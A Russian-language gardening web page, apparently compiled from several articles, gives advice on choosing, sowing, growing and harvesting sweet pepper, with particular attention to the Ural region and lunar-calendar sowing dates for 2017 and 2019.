0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Правила посадки салатного перца на урале

Перец: особенности ухода, посадки и выращивания

В природе насчитывают более 2 000 видов перцев, а их родина — Центральная Америка. В этой статье я расскажу про сладкий перец, который называют еще болгарским. «Мексиканец» попал в Европу в 15 веке и кружными путями, через Испанию, Турцию, Иран, в конце концов проник в наши края. Здесь он серьезно прижился, несмотря на теплолюбивость и капризный нрав — ведь достоинств у перца хоть отбавляй! Он не только богат яркими расцветками, придающими блюду праздничный вид, не только вкусен и сочен, но и является бесценным кладезем витаминов. По этой части с ним сравнится редкий овощ или фрукт.


Поспевает сладкий перец

Но чтобы получить хороший урожай, придется постараться. Этот «южанин» любит теплую погоду, поэтому в средних широтах выращивают его по большей части рассадой и в теплицах.

Перец — растение короткого дня, то есть если световой день длится менее 12 часов, перец раньше начинает переходить к плодоношению и, что немаловажно, дает более стабильные и высокие урожаи.

Сорта перца

Прежде чем сажать перец, необходимо определиться с выбором сорта, и тут все зависит не только от ваших вкусовых предпочтений, но и от назначения будущих плодов. Так, если вы намерены употреблять перцы преимущественно в свежем виде, лучше отдать предпочтение более толстостенным и крупноплодным сортам, например ‘Калифорнийское чудо’, ‘Гладиатор‘, ‘Винни-Пух’ или ‘Подарок Молдовы’. Если же основное назначение — консервация, то выбирайте мелкоплодные сорта, относящиеся к «сибирской» серии: ‘Купец’, ‘Ермак’, ‘Виктория’ и другие.

Один из самых скороспелых сортов перца, плоды созревают рано и дружно. После первого урожая перец сорта ‘Ермак’ снова зацветает и дает хороший второй урожай. Очень крупные плоды, масса которых доходит до 250 г. Урожайность сорта — 12-15 кг/м².

  • ‘Гладиатор’

Среднепоздний голландский сорт с большими ярко-желтыми плодами, вкусными, с толстой мякотью. Толщина стенок плодов доходит до 13 мм, вес отдельных экземпляров достигает 380-400 г, а урожайность 10-12 кг/м².

  • ‘Медаль’

Раннеспелый сорт, отличающийся растянутым плодоношением. Он постоянно цветет и образует новые завязи. Плоды сорта Медаль достаточно крупные — до 150 г, в биологической спелости ярко-красные по цвету, с толщиной стенки около 8-13 мм. Урожайность сорта достигает 16 кг/м².

  • ‘Йова’

Один из наиболее скороспелых российских сортов, начиная с появления всходов и до момента технической спелости проходит около 95-100 дней. Очень урожайный, сочный и толстостенный. Урожайность до 14 кг с одного квадратного метра, а масса некоторых его плодов превышает 250 г. Неприхотлив и дает отличные урожаи даже на тяжелых почвах.



  • ‘Калифорнийское чудо’

Сорт среднеранний, масса плода до 400 г, а толщина стенки до 12 мм.

  • ‘Черный кардинал’

Относится к поздним итальянским сортам, имеет необычайно красивые черно-фиолетовые плоды (в технической спелости) переходящие в красный (в биологической спелости). С 1 м² до 10 кг урожая.

  • ‘Виктория’

Сорт среднеранний, плоды по массе относительно небольшие — до 110 г, конусовидные, слаборебристые, длиной около 7-13 см, толщина стенок 7-8 мм. Урожайность 9-10 кг/м².

Обширный ассортимент семян сладкого перца вы можете найти в нашем каталоге. Смотреть подборку семян сладкого перца:

Выращивание рассады перца

Если у вас нет теплицы, то семена перца необходимо высевать в феврале, чтобы до момента пересадки в мае растения были в возрасте 90-100 дней. Перец плохо переносит пикировку, поэтому старайтесь сразу сеять семена в индивидуальные торфяные горшочки диаметром около 8-10 см. Использовать большие горшки не имеет смысла из-за медленного развития его корневой системы.


Торфяные горшочки для перца — хороший вариант

Субстрат для выращивания перца рассадным способом должен быть легкий и рыхлый и состоять из 2 частей перегноя, смешанного с 1 частью песка и 1 частью земли. На 1 кг такой смеси необходимо добавить столовую ложку золы.

Семенам перца необходима предпосадочная обработка — их нужно держать до набухания на протяжении пяти часов в воде, температура которой около +50°С. После этого их необходимо поместить для наклевывания во влажную ткань на 2-3 дня, температура в помещении около +20°С. Проведя такую несложную предпосадочную подготовку семян, вы получите всходы уже буквально на следующий день после посева.

Посеянные семена перца необходимо хорошенько полить, а сразу после этого накрыть полиэтиленовой пленкой либо стеклом. До появления всходов они могут находиться в любом теплом (около +22°C) месте, освещение при этом неважно, можно и в темноте. После появления всходов оптимальная температура для выращивания рассады днем около +26. +28°С, ночью около +10. +15°С.

Не стоит баловать перцы излишними поливами, это может только повредить им — вызвать заболевание черной ножкой. Но старайтесь не допустить и пересыхания субстрата. Вода для полива должна быть теплой — около +30°С, от чрезмерно холодной рассада будет хилой, заболеет и даже может погибнуть. Не забывайте следить и за воздухом в помещении, в котором выращивается рассада, он должен быть не слишком сухим. Опрыскивайте растения, а само помещение хорошенько проветривайте, не забывая защищать от сквозняков.

Рассада перца требует дополнительного освещения. На протяжении февраля месяца ее необходимо освещать с 7 часов утра до 9 вечера. Перед высадкой рассада нуждается в закаливании, постепенному приучению к лучам солнца, более низким температурам, ветру и дождю. Для этого растение выносят на свежий воздух, понемногу увеличивая время его пребывания там. Во время закаливания следите за погодными условиями, нельзя допустить чтобы рассада перца попала под заморозок либо пониженную температуру — для перца это ниже +13°С.

Посадка перца

Лучшие предшественники для перца: лук, огурцы, тыква, капуста после сидератов, кабачок и морковь. Плохие предшественники: картофель, перец, помидоры, физалис и баклажан.

Для выращивания лучше всего подходят легкие почвы. Почву под перец лучше приготовить заранее — за год, внеся под предшественника 5 кг органических удобрений на квадратный метр, а осенью по 50 г калийных и фосфорных удобрений под глубокую перекопку. Весной на участок — в верхний слой грунта, вносим 40 г аммиачной селитры. За пять дней до того как пересаживать рассаду перца на постоянное место, займитесь обеззараживанием почвы, делать это необходимо с помощью раствора — на ведро воды добавляем столовую ложку медного купороса.

Высаживают рассаду в открытый грунт в конце мая — середине июня, по схеме 40х40 см. В пленочную неотапливаемую теплицу рассаду перца высаживают в начале апреля, а в туннельные укрытия — в конце мая.


Высаживание перца

Помещать саженцы в лунки старайтесь на такую же глубину, на которой растения росли в рассадном ящике, не обнажая корни и не прикапывая его прикорневую шейку. Перец не любит холодного грунта, и если вы хотите получить серьезный урожай, устройте ему высокие грядки, которые необходимо поднять на 25-55 сантиметров.

Помните, перец сильно подвержен переопылению, поэтому если вы сажаете на своем участке несколько его сортов, старайтесь расположить их на максимальном удалении друг от друга и по возможности разделяйте их между собой с помощью посадок высокорослых помидоров, кукурузы и подсолнечника.

Выращивать перец высадкой семян в открытый грунт нецелесообразно даже в южных регионах. Сеять придется все равно поздно, когда почва прогреется, растение будет развиваться медленнее, первые плоды поспеют позже, да и срок плодоношения перца окажется существенно короче.

Уход за перцем

Уход за перцем состоит из своевременных поливов, подвязок, прополок и подкормок. Первую подкормку рассады перца необходимо провести в фазе 1-2 настоящих листиков, для чего в 1 л воды смешивают 0,5 г аммиачной селитры, 1 г калийных удобрений и 3 г суперфосфата. Вторая подкормка через 2 недели после первой, дозу минеральных удобрений для нее необходимо удвоить.

Эффективны подкормки рассады перца специальным настоем крапивы, для приготовления которого необходимо взять 1 часть крапивы и 10 частей воды — настаиваем 2 дня. Последнюю подкормку нужно провести за 2 дня до того, как вы намерены высадить рассаду на постоянное место, при этом дозу калийных удобрений увеличиваем до 7 г на 1 л воды. За сезон нужно произвести около 3-4 подкормок перца куриным пометом — 1:10, чередуя такие подкормки с внекорневыми, для которых нужно использовать минеральные удобрения, например нитрофоску (столовая ложка на ведро воды).


Грядка перцев

При недостатке калия листочки перца скручиваются и на них появляется засыхающая кайма. Но с калием необходимо быть осторожным — перец не переносит изобилие хлористого калия. Если растению недостает азота, его листья становятся матовыми и, приобретая сероватый оттенок, постепенно мельчают. Когда недостает фосфора, нижняя сторона листочков перца становится насыщенно фиолетовой, а сами листья прижимаются ближе к стволу растения и поднимаются вверх. Если недостает магния, листики приобретают мраморную окраску, а излишек в почве азота приводит к сбрасыванию завязей и цветков перца.

В жаркую и влажную погоду обязательно необходимо проводить пасынкование (удаление боковых побегов), особенно это касается нижних пасынков, и наоборот, если стоит жаркая, но сухая погода, растения не пасынкуют, поскольку листовая масса отлично предохраняет от испарения влажность почвы. Опытные овощеводы советуют удалять центральный цветок на растении, растущий из первого разветвления, это поспособствует повышению урожая.

В период вегетации перцы необходимо несколько раз обрезать, стараясь укорачивать самые длинные побеги и добиться отсутствия затененных ветвей. Обязательно удаляйте все отростки перца ниже главной развилки его стебля, а также ветки внутри кроны. Обрезку необходимо производить раз в десять дней и после сбора плодов. Одновременно с обрезкой производят и обработку почвы.

Постарайтесь привлечь в огород насекомых-опылителей, для этого во время цветения опрыскивайте растения сахарным раствором: на литр горячей воды 100 г сахара и 2 г борной кислоты. Отличный результат дают подкормки перца жидкими органическими удобрениями.

Полезно мульчировать перец перепревшей соломой — слой около 10 см, благодаря чему можно сократить частоту поливов, сведя их до раза в 9-10 дней. Своевременный уход за растениями перца заключается и в подвязке растений. Производить подвязку необходимо после окучивания и мульчирования.

Вредители и болезни

Наиболее распространенные болезни перца: фитофтороз, белая гниль, макроспориоз, вершинная гниль, септориоз, черная ножка. Больше других перцу причиняют вред слизни, белокрылка, совка, тля, колорадский жук и медведка. Для защиты перца от повреждения медведкой за час до высадки его рассады предварительно сделанные лунки необходимо наполнить водой. Высадив рассаду перца, опять распылителем опрыскать посадки. За сезон 3 раза растения перца необходимо опылять с помощью древесной золы — лучше по росе. Это также поможет защитить их от вредителей.

Если вы заметите на рассаде перца тлю, обработайте перец с помощью сыворотки — полтора литра на ведро воды. После проведения данной процедуры припудрите растения просеянной древесной золой.

Как правильно посадить рассаду перца на Урале

Опытные садоводы и огородники уже в январе начинают заниматься планированием будущего урожая – изучают литературу, закупают семена и инвентарь. Особенно, ранняя подготовка затрагивает жителей Урала. Опытные огородники стараются как можно раньше распланировать посадку перца на Урале по лунному календарю, чтобы в конце сезона получить отличный урожай.

Как известно, этот регион характеризуется специфическими климатическими условиями выращивания овощных и плодовых культур. Перец характеризуется большим содержанием питательных веществ и витаминов и обладает красочной палитрой вкусовых качеств – сладкий, горький, кисло-сладкий, что обуславливает его использование во многих блюдах и заготовках на зиму.

На сегодня разнообразие укрывных материалов и агротехнических возможностей позволяет выращивать перец в Сибири и на Урале. Для получения отличного урожая перца на Урале необходимо грамотно приступить к выбору сорта. Поэтому при покупке семян нужно лучше изучить сортовые особенности перца и все нюансы выращивания его на Урале.

Правила грамотного выбора семенного материала

Выращивание рассады в уральских условиях нужно акцентировать выбор на раннеспелых сортов. Более 10 лет на территориях уральской земли этот овощ выращивают успешно, получая сочные и ароматные плоды. Особое внимание при выращивании следует обратить на соблюдение всех агротехнических мероприятий – посев семян, уход. Специалисты рекомендуют следующие адаптированные для Урала сорта:

  1. «Колобок» характеризуется небольшой структурой куста и весом плода примерно 85 гр, такой перец лучше выращивать в тепличных условиях или в грунте.
  2. «Тополин» отличается большими плодами массой 120 граммов, перцы красного окраса имеют сладкий вкус, а кусты являются высокорослыми и часто выращиваются на шпалерах.
  3. «Первенец Сибири» является среднеспелым сортом с высотой стебля до 50 сантиметров, масса перца составляет примерно 50 граммов, цветовые окрасы могут варьировать от красного до желтого цвета.
  4. «Сибиряк» — это среднеспелый перец с высотой куста до 50 сантиметров и массой плодов около 120 граммов, отлично культивируется в обогреваемых и необогреваемых тепличных устройствах.
  5. «Монтеро» — перец раннего созревания высотой около метра, окрас плодов – ярко-красный, в условия Урала его выращивают в тепличных условиях.
  6. «Купец» характеризуется ранними сроками созревания, плоды образуются массой около 65 граммов.
  7. «Пионер» — перец для созревания, которого требуется примерно 120 дней, масса плода составляет примерно 60 граммов.
  8. «Винни Пух» является скороспелым сортом, вегетационный период составляет около 120 дней, перцы созревают одновременно, что облегчает их сбор.
  9. «Богатырь» — среднеспелый сорт, такой сорт считается наиболее адаптированным к выращиванию на земле Урала, масса плода составляет примерно 150 граммов, лучше всего выращивается в теплицах и грунте.
  10. «Бык» — это среднеспелый сорт, который характеризуется красным и желтым окрасом плодов, с массой примерно около 200 граммов. Для климата Урала такой сорт является наилучшим среди вышеперечисленных.

Необходимо отметить, что при выращивании сладкого и горького перца, нужно провести четкую границу, и садить их в разных парниках, так как горький перец может переопылиться со сладким и вкусовые качества будут утеряны полностью, то есть сладкий перчик станет совсем не сладким.

В течение вегетации перец требует следующих температур:

  • днем +24 градуса по Цельсию;
  • ночь должна обеспечивать температуру в пределах от 28 до 20 градусов.

Важно! Следует четко помнить, что сладкий перец – это теплолюбивое и светолюбивое растение, требующее регулярного ухода (полив, рыхление).

При выборе сортов перцев на Урале нужно четко прочитать инструкцию и сажать перец нужно так, чтобы вегетационный период равнялся 90–130 дней.

Определение сроков посева семян

Резко континентальный климат Урала требует специальных условий для выращивания перцев, в основном их выращивают на участке под пленочным укрытием или в теплице. В открытый грунт саженцы высаживают примерно 25–30 мая. Несмотря на суровый климат Урала, перцы успевают вызреть и порадовать овощеводов богатыми урожаями спелых и сочных плодов перца.

Чаще всего семена на рассаду сею в двадцатых числах февраля, именно такие сроки позволяют семенам хорошо прорасти и достичь определенного роста для выращивания здоровых саженцев.

Семена, высеянные в эти сроки в последующем, укладываются во все сроки и дают урожай через 100 дней после высадки в открытый грунт или в теплицу.

Суровые условия Урала характеризуют появление плодов в то время, когда в южных районах России уже полностью насыщаются зеленью и начинают заниматься заготовками на зиму. Несоблюдение сроков посева семенного материала перцев может привести к 2 негативным причинам:

  1. Вытягивание ростков.
  2. Опоздание вызревания плодов перца.

Короткое лето и недостаток тепла позволяет выращивать перчики жителям Урала только в тепличных условиях. Высевать семена следует с таким расчетом, чтобы период от высева семян о созревания плодов составлял около 120 дней плюс примерно 2 недели на время, чтобы всходы взошли и окрепли.

Лунный календарь 2017 года для уральских земель определяет следующий срок высева семян на рассаду – 20 февраля. Оптимальными сроками являются:

  • 14–16 февраля нужно посеять семена сладкого перца;
  • 16–18 – посев семян горького перца;
  • 23 февраля возможно высеять семена сладкого перчика.

Важно! С 19 по 22 февраля являются неблагоприятными днями для посева, то есть в эти периоды следует воздержаться от высева.

Если вы не успели посеять семена перца в феврале, то посадка перца на Урале по лунному календарю 2017 года, вы без проблем сможете высеять их в марте. Сроки позволяют получить крепкие сеянцы, благоприятными днями считаются:

  • с 3 по 5;
  • с 6 по 14;
  • с 30 по 31 марта.

По календарным данным и опыту овощеводов строго запрещается прикасаться к почве и семенам 6 марта.

Бывают случаи, не зависящие от нас, когда человек не успевает посеять семена ни в феврале, ни в марте, тогда следует обратить внимание на апрельские сроки посева. Для получения крепкой рассады, следует поторопиться и четко соблюсти все правила посева и ухода за ростками. В апреле 2017 года прекрасно подойдут следующие даты: с 9 по 12 апреля на восходящей луне, с 24 по 25 апреля и 30 числа.

Люди, занимающиеся высадкой семян по лунному календарю, давно отдают предпочтение этим срокам и в результате получают большой урожай сочных плодов яркой окраски.

Подготовительные работы посевного материала

Перед посевом семенной материал перцев следует проверить на всхожесть, а для этого их замачивают в воде комнатной температуры или в слабом соляном растворе. Полнозернистые семена останутся на дне, а пустые всплывут на поверхность, то есть посеву подлежат семена, оказавшиеся на дне. Для стимуляции к прорастанию следует проводить следующие мероприятия:

  • облить теплой водой и оставить примерно на 20 минут, затем поставить в прохладное место, например, в холодильник на сутки;
  • обработать семена перца раствором биологического стимулятора роста – «Циркон» или «Эпин».

Некоторые овощеводы сажают семена сразу в почву, некоторые предварительно проращивают. Ростки от пророщенных семян дают более дружные и крепкие всходы.

Для дезинфекции семян используют следующие методы:

  • залить семена слабым раствором древесной золы, такой раствор позволит избавиться от болезнетворных микробов и насытиться питательными веществами;
  • прогреть семенной материал в горячей воде. Стоит отметить, не в кипяченной, а в горячей воде с температурой 55 градусов по Цельсию в течение 30 минут;
  • прогрев семян сухим теплым потоком воздуха, возможно, провести это мероприятие в духовке;
  • замочить семена перца в луковой шелухе, для этого на один литр воды вносят горсть шелухи, семена замачивают в течение 3 часов.

Опытные овощеводы часто используют следующие рецепты:

  • чайную ложку меда растворить в стакане воды и замочить семена сроком на 1 час;
  • сок цветка алоэ, ля замачивания листья алоэ в течение недели выдерживают в холодильнике, затем выжимают сок, разбавляют водой в пропорции 1:3 и замачивают семена.

Способы посева семян перца на Алтае

Ля высева семян следует подготовить почвенный субстрат, обработав почву раствором перманганата калия или просто купить грунт для выращивания рассады перца в специальном магазине. Посев можно также проводить в торфяные таблетки.

Некоторые овощеводы сажают семена в отдельные стаканчики по 2—3 семечка, такой способ позволяет избежать пикирования, что благотворно сказывается на развитии корневой системы перца.

Семена следует заделывать на глубину от 2 до 3 сантиметров. После заделки семян в почву, их поливают и накрывают пленкой, для создания оптимальных условий. После этого емкость помещают в теплое и светлое место. Температура в пределах 30 градусов позволяет получить всходы перчиков в течение 5 дней.

Важно! Рассаду перцев следует систематически проветривать, нельзя опускать переувлажнения почвы, так как это может вызвать появление грибковых заболеваний.

После появления ростков, пленку снимают и вставляют емкость с ростками на светлое теплое место, обеспечивая своевременные поливы. После появления четырех настоящих листочков, перцы пикируют в пеленки или стаканчики.

Заключение

Из вышеперечисленной информации совершенно очевидно, что выращивание перца в 2017 году по лунному календарю не имеет никаких особенностей. Особое внимание следует обратить на сроки посева семян перца на Урале.

Соблюдение сроков и правильной технологии позволит вам получить отличные урожаи перца даже в таких суровых условиях, как Урал.

Правила посадки салатного перца на Урале

Посадка перца на Урале довольно хлопотное занятие. В условиях сурового климата теплолюбивое растение требует к себе особого внимания. О том, как правильно проводить посадку расскажем подробно в статье.

Правила посадки салатного перца на Урале

Правила выращивания

Чтобы вырастить перец на Урале, необходимо соблюдать основные правила агротехники:

  1. Для посева сладкого перца на Урале лучше выбирать скороспелые или среднеспелые гибриды. Это обусловлено тем, что такие сорта отличаются холодостойкостью. Процесс образования завязей на гибридных сортах проходит более интенсивно.
  2. Выращивают рассадным методом.
  3. Строго соблюдают сроки посадки перца на рассаду на Урале.
  4. Готовую рассаду необходимо сажать в теплицу. Это поможет обеспечить комфортные условия для вегетации растения при любых погодных условиях.
  5. Обрабатывают культуру стимуляторами роста и развития.

Выращиваем рассаду

Сажать ароматный перец на Урале начинают с выращивания здоровой рассады. Сроки посева семян зависят от того, какие сорта подобраны для посадки. Период вегетации длится более 100 дней. Начинать посев перца на рассаду на Урале рекомендуется во второй половине февраля.

Готовим семена

Агрономы рекомендуют сеять перец на рассаду на Урале только гибридных сортов. Из ранних культур садят:

Из среднеспелых огородники рекомендуют сажать:

Такие виды не требуют обработки с целью обеззараживания. Перед тем как сеять, выбранные семечки лучше замочить в стимуляторах роста. Довольно хорошо зарекомендовали себя Мивал Агро, Экогель, Эмистим. Это повысит степень всхожести и ускорит процесс формирования здоровой корневой системы

Почва для рассады

Рыхлая почва для перца

Перец не любит пересадок. Чтобы уменьшить стресс от пересадки, садить перец на рассаду на Урале следует в легкие и рыхлые почвы.

В выбранную смесь для посадки сладкого перца нужно добавить почвенный гидрогель. Так растение будет защищено от переувлажнения или недостатка влаги.

Температура

В течение всего срока прорастания семян необходимо поддерживать температуру в помещении 24 — 26 °С. Первые всходы появятся через 10–14 дней.

Если столбики термометра колеблются в пределах от 20 до 24 °С, то ростки покажутся не ранее чем через две недели.

Если в помещении не получается поддерживать температуру на необходимом уровне, лучше сделать мини-теплицу.

Первые всходы

После появления первых ростков температуру в дневное время поддерживают на уровне 24 °С. Ночная температура должна быть в пределах от 16 до 18 °С.

Всходы требуют большого количества света. Световой день должен продолжаться от 12 до 14 часов. Для этого помещение оборудуют дополнительными лампами дневного света.

Пересадка

Когда на всходах перца появились три настоящих листика, растения следует пересадить. Для этого необходимо подготовить отдельные емкости для каждого ростка. Посадить всходы перца нужно в плодородную почву. Можно обработать ее гидрогелем. Перед такой обработкой гидрогель следует замочить в растворе минеральных удобрений.

Полив

Перец любит влагу. Поливают рассаду теплой отстоянной водой. Нельзя допускать переувлажнения. Полив рекомендуется проводить по необходимости.

Удобрения

После пересадки сеянцев нужно начинать подкормки растения. Первое внесение удобрений проводят через 7-10 дней после пикировки. Перерыв между подкормками должен составлять одну неделю.

Для удобрения в этот период лучше всего использовать специальные комплексные препараты. В их составе содержатся все миро и макроэлементы. Хорошие отзывы получил состав «Кемира Люкс».

Закаливание рассады

Процесс привыкания рассады к естественным условиям роста начинают со второй половины марта. Ежедневно следует выносить емкости с саженцами на застекленную лоджию или закрытый балкон.

Подготовка теплых грядок

Высаживаем только в подготовленные грядки

Выращивают на теплых грядках. Для заправки используют навоз вместе с соломой и листвой, ботву, прочую органику.

Процесс подготовки грядок в теплице проходит в несколько этапов:

  1. Гряды накрывают прозрачной пленкой. Это ускорит процесс оттаивания верхнего слоя почвы.
  2. Собранную органику рассыпают по грядкам и обильно проливают горячим раствором мочевины. Раствор готовят из расчета одна столовая ложка с горкой сухого удобрения на 10 литров воды.
  3. Грядки снова закрывают пленкой и оставляют на несколько дней.
  4. Поверх органики насыпают почву, обогащенную минеральными удобрениями и золой. Слой почвы должен быть не менее 10 см.

Высадка рассады в теплицу

Переносить рассаду в теплицу начинают в последней декаде мая. В это время на ростках уже имеются бутоны.

Всходы следует обильно полить. Потом аккуратно вытащить из тары и высадить в подготовленные лунки. Не рекомендуется заглублять всходы.

Схема посадки

При высадке рассады на постоянное место следует соблюдать схему посадки:

  1. Высокорослые сорта высаживают на расстоянии не менее 45 см друг от друга. Расстояние между рядами оставляют 70 см.
  2. Низкорослые гибриды высаживают на расстоянии 35-40 см, междурядья делают 70 см.

Внутренние укрытия

На Урале вероятность заморозков сохраняется до середины июня. Агрономы рекомендуют использовать внутри теплицы дополнительные укрытия.

Для этого устанавливают дуги, натягивают плотный материал. В теплые солнечные дни укрывную пленку снимают, а на ночь возвращают на место.

Полностью снять дополнительное укрытие можно только в третьей декаде июня.

Удобрения

Перчик любит плодородные почвы. Внесение удобрений при пересадке перца на Урале зависит от состояния грунта.

Для удобрения бедных почв используют смесь органических удобрений с минеральными.

В качестве органик берут перегнивший компост. Из готовых препаратов можно использовать Кемиру Люкс.

Уход за кустами

Хорошая и крепкая рассада

Посадка перца на рассаду на Урале заключается в создании комфортных условий для вегетации культуры на любой ее стадии. Организовывать уход за растением нужно с учетом особенностей выбранного сорта.

Подкормки

Внесение удобрений способствует увеличению объема урожая. Регулярная подкормка культуры осуществляется следующим образом:

  1. Еженедельные корневые и внекорневые подкормки. Рекомендуется использование комплексных удобрений. Применять препараты нужно строго в соответствии с инструкцией производителя.
  2. Использование питательных смесей с продолжительным эффектом. Такие удобрения обеспечивают поступление питательных веществ к растению постоянно.

Состав почвы

Перчик не любит тяжелых и плотных почв. Это приводит к недостатку воздуха корневой системе культуры.

Обеспечить воздухопроницаемость грунту следует за счет рыхлящих добавок. Можно использовать опилки, сено, измельченную кору деревьев.

Поможет в решении этой проблемы мульчирование. Прикорневую зону укрывают слоем листвы, соломы или слоем перегноя.

Режим полива

Неправильный режим полива сказывается на растении:

  • Недостаток влаги приводит к опаданию завязей;
  • Избыточная влажность провоцирует развитие заболеваний.

Сигналом к поливу должна служить слегка подсохшая почва. Поливают растения только под корень. Для полива используют воду, прогретую до температуры 33 — 35 °С.

Опыление

На Урале опыление происходит тяжело. Чтобы не допустить опадание завязей, растения обрабатывают стимуляторами плодообразования. В специализированных магазинах предлагают препарат Бутон.

Не рекомендуется высаживать одновременно сорта сладкого и горького перца. Это приведет к скрещиванию гибридов. Плоды будут иметь сладко-горький вкус.

Формирование кустов

Рассада подвержена болезням

Климатические условия Урала не позволяют получать урожай на многочисленных побегах растения. Формирование кустов стимулирует к обильному плодоношению.

Формируют кусты следующим образом:

  1. Второстепенные побеги удаляют по мере их появления.
  2. Число верхних пасынков зависит от количества света и продолжительности дачного сезона. При неблагоприятных условиях перчик формируют в три стебля.
  3. По мере созревания урожая удаляют отплодоносившие побеги.
  4. Удаляют побеги с признаками развития заболеваний.

Подвязка растений

Перчик довольно хрупкое растение. Под тяжестью плодов ростки могут ломаться. Чтобы не допустить этого, растения подвязывают.

Подвязку проводят шпагатом под первым разветвлением. Далее каждый побег отдельно.

Под плоды, которые расположены близко к земле, подкладывают дощечки. Так защищают их от развития гнилей.

Болезни и вредители

Из-за особенностей климата посадки культуры на Урале подвержены нашествию клещей и тли. Среди заболеваний опасность для растения представляют белая и серая гнили.

Вредители

Борьбу с вредителями начинают при первых признаках появления вредных соседей.

  1. В период, когда цветов и плодов еще нет, растение обрабатывают инсектицидами. Среди них хорошо себя зарекомендовал Актеллик.
  2. Борьба с вредителями, которые появились в более поздний период, требует применения более концентрированных составов. Можно воспользоваться Фитовером.
  3. Применение народных средств не дает ощутимых результатов.

Болезни

Рассаду поражают грибковые заболевания. Признаками развития заболеваний являются мокнущие пятна на листьях, плодах и в основании побегов.

Для эффективной борьбы с заболеваниями проводят профилактические мероприятия:

  1. Соблюдают правила севооборота. Для этого ежегодно меняют грунт в теплицах.
  2. После сбора урожая все остатки сжигают.
  3. Сбор пораженных плодов проводят отдельно. Их уничтожают.
  4. Теплицы регулярно проветривают, чтобы не допустить образование конденсата.

Сбор урожая

Плоды перчика готовы к употреблению на стадии технической зрелости. В этот период перчинки имеют зеленый цвет.

Огородники не допускают полного созревания плодов на кустах. В период дозревания на кустах не появляются новые завязи. Объем урожая будет скудным.

Собранные технически зрелые плоды в течение недели достигнут своей биологической зрелости. Для этого перчики помещают в темное помещение и поддерживают температуру не ниже 20 °С. Если температура будет ниже, то плоды созреют через месяц.

Тонкости

Сбор урожая проводят по следующим правилам:

  1. Плоды собирают сухими. Утренняя роса может привести к загниванию перца во время хранения.
  2. Нельзя отламывать или пытаться оторвать плод с куста. Это приведет к повреждению растения. Перец нужно обрезать.

Советы опытных огородников о том, когда лучше сеять перец на рассаду в 2019 году на Урале

Своевременная посадка семян перца в сложных климатических условиях Урала – обязательное условие получения крепкой рассады, высоких урожаев на ней. Опытные огородники, прежде чем определиться, когда сеять перец на рассаду, выбрать наиболее благоприятные, подходящие сроки, считают важным учитывать:

  • вегетационные сроки роста сорта – от момента высадки семени до посадки выросшей рассады в грунт;
  • климатические особенности текущего года;
  • закрытость/открытость грунта на месте высадки;
  • лунные фазы приходящиеся на дату посадки.

Какие сорта перцев лучше сажать на Урале

Короткое, прохладное уральское лето совсем не благоприятно для такого теплолюбивого растения как сладкий перец, но… В регионах с холодным климатом селекционеры вывели, а огородники научились выращивать виды максимально адаптированные к таким условия. При этом основное правило выбора – сажать подходящие сорта. Предпочтительными для высаживания считают:

  1. Перцы раннего, среднераннего срока созревания, т.к. позднеспелые сорта не успевают вызревать (даже в теплицах).
  2. Культуры местной селекции, недавно выведенные гибриды.
  3. Сорта из Госреестра с пометкой – “для Уральского региона”.

Наилучшие скороспелые сорта для территорий Урала:

Наименование Время созревания (техническая зрелость), дней Сортовые особенности Урожайность (для открытого грунта), кг/с м2 Вес плодов,гр Устойчивость к неблагоприятным факторам
Фиделио -золотисто-белый гибрид 80-100 Кустарник рослый (1,5-1,7 м.), с длинными междоузлиями. Плоды пониклые, крупные, выровненные, кубовидные, с вогнутой вершиной, тонкостенные. Подходит для теплиц, открытого грунта. 2-3,5 85-120 Хорошая устойчивость к вирусу табачной мозаики.
Желтый колокол 85-95 Кусты раскидистые, высокорослые, требуют подвязывания. Плоды призмовидные, пониклые, толстостенные. Подходит для теплиц, парников, открытого грунта. 2,5-5 150-200 Легко переносит разницу ночных, дневных температур. Редко заболевает табачной мозаикой, черной бактериальной пятнистостью. Слабо поражается паутинным клещом.
Винни Пух красноплодный 107-110 Куст компактного типа, среднерослый (высота 35-45 см.). Перцы конусовидные, с продольной ребристостью, заостренным кончиком. 1,8-2,2 55-75 Листья, стебли могут быть подвержены бактериальным заражениям. Поражается черной ножкой. фитофторозом. Мало поражается тлей.
Колобок – красноплодный сорт 108-112 Куст компактный, высотой 35-40 см. Плоды шарообразные, томатовидные, мясистые, небольшие. Можно выращивать в открытом грунте, теплице, балконе. парнике. Подходит для загущенных посадок, требователен к качеству грунта. 4,8-5,2 102-170 Мало подвержен нападению вредителей. Толерантен к вертициллезному увяданию.

Сорта среднераннего срока созревания, гибриды местной селекции:

Название Срок созревания (техническая спелость), дней Особенности сорта Урожайность, (для открытого грунта) кг./с м2 Масса плодов, гр. Устойчивость к неблагоприятным факторам
Желтые, красные Быки 95-108 Куст сильнорослый, высотой 1-1,2 м, нуждается в прищипывании верхушки, пасынковании, формировании. Перцы широкие, призмовидные, длиной 25-30 см. Сорт толстостенный, имеет: длительный период плодоношения (до наступления заморозков) 8-9 200-250 Устойчив к основным грибковым заболеваниям перцев, к вирусной табачной мозаике, практически не поражается тлей, паутинным клещом.
Богатырь – красноплодный сорт 125-135 Высота куста 50-70 см, практически отсутствуют пустоцветы. Кусты хрупкие, раскидистые, нуждаются в установке опоры. Плоды конусовидные, длиной 15-17 см, высоких вкусовых качеств, отличаются хорошей транспортабельностью, лежкостью. Подходит для выращивания в открытом/закрытом грунте. 6-7 160-200 Устойчив к температурным колебаниям, плохо переносит засуху, дает малый урожай в тени. Слабо устойчив к септориозу, альтернариозу, черной ножке. Восприимчив к тле.
Викинг – красноплодный сорт 110-115 Куст невысокий (40-50 см), полу раскидистый. Перцы пониклые, цилиндрической формы, гладкие, устойчивы к растрескиванию кожицы. Пригоден для выращивания в открытом грунте/под пленочным укрытием. 3-3,5 85-105 Морозостойкий, хороший иммунитет к вирусным болезням.
Золотой телец – желто-оранжевый вид 115-130 Куст средней высоты (60-70 см.), полу раскидистый, Плоды кубовидной формы, толстостенные. Подходит для выращивания на открытых грунтах, пленочных туннелях, теплицах. Нуждается в регулярных поливах в открытом грунте, подкормке комплексными минеральными удобрениями, удалении пасынков. 7-8 Устойчив к температурным перепадам. Толерантен к вирусу вертициллезного увядания, табачной мозаики. Среднеустойчив к фитофторозу.

Сроки посева перца на рассаду на Урале в 2019 году

Чтобы точно рассчитать срок посева семян нужно учитывать:

  • сортовые сроки всего вегетационного периода;
  • предположительную дату посадки рассады на постоянное место;
  • какое количество дней семечко прорастает до состояния рассады.

На подоконнике в домашних условиях

